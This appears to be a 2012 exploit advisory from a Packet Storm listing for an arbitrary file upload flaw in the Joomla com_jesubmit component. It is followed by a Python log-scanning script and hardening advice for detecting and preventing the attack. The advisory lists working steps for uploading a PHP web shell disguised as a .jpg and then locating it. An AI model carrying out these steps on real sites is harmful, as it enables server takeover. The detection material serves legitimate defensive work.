Joomla Jesubmit Shell Upload

2012-01-24T00:00:00
ID PACKETSTORM:109051
Type packetstorm
Reporter Robert Cooper
Modified 2012-01-24T00:00:00

Description

                                        
`# Exploit Title: Joomla Component (com_jesubmit) Arbitrary File Upload
# Date: 1/24/2012  
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )  
# Tested on: [Linux/Windows 7]  
  
  
##############################################################  
Exploit:  
  
#Visit the website  
  
#Navigate to index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en  
or  
#index.php/component/option,com_jesubmit/Itemid,[id]/view,jesubmit/  
  
#Upload your shell with the extension .jpg

#Use Tamper Data to change the extension to .php

#Locate your shell by inspecting the source (usually /images or /user_images). It will still have the .jpg extension in the path; just change the extension in the URL.
  
##############################################################  
  
www.areyousecure.net  
  
www.websiteauditing.org  
  
  
# Shouts to the Belegit crew  
`
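
For defenders, the steps above leave a recognisable trace in web server access logs: a POST to the component followed by a request for a script file under an upload directory. The following Python check is an added example, not part of the original advisory; the Combined Log Format, the script-extension list, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Both URL forms the advisory gives for reaching the component.
JESUBMIT_RE = re.compile(r'option[=,]com_jesubmit', re.I)
# Upload locations named in the advisory; adjust to the site's configured path.
UPLOAD_DIR_RE = re.compile(r'/(?:images|user_images)/', re.I)
# Extensions commonly mapped to the PHP handler (assumption; match your server config).
SCRIPT_EXT_RE = re.compile(r'\.(?:php\d?|phtml|phar)(?:/|$)', re.I)


def find_upload_abuse(lines):
    """Return (ip, path, status, posted_before) for script requests under upload dirs."""
    posters = set()   # clients seen POSTing to the component earlier in the log
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)
        if method == "POST" and JESUBMIT_RE.search(unquote(target)):
            posters.add(ip)
        if UPLOAD_DIR_RE.search(path) and SCRIPT_EXT_RE.search(path):
            hits.append((ip, path, int(status), ip in posters))
    return hits


# Constructed sample log lines (documentation addresses, made-up file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jan/2012:10:00:01 +0000] "GET /index.php?option=com_jesubmit&view=jesubmit&Itemid=5&lang=en HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [24/Jan/2012:10:00:09 +0000] "POST /index.php?option=com_jesubmit&view=jesubmit&Itemid=5&lang=en HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.7 - - [24/Jan/2012:10:00:15 +0000] "GET /images/photo1.php HTTP/1.1" 200 44 "-" "-"',
    '203.0.113.9 - - [24/Jan/2012:10:01:00 +0000] "GET /images/banner.jpg HTTP/1.1" 200 20480 "-" "-"',
    '203.0.113.9 - - [24/Jan/2012:10:02:00 +0000] "GET /user_images/a.PHP?x=1 HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for ip, path, status, posted in find_upload_abuse(SAMPLE_LOG):
        tag = "after jesubmit POST" if posted else "no prior POST seen"
        print(f"{status} {ip} {path} ({tag})")
```

A 200 response on a flagged path means the server handled a script stored in an upload directory. Choosing the stored file name and extension server-side and disabling script handlers in those directories removes the condition the advisory relies on.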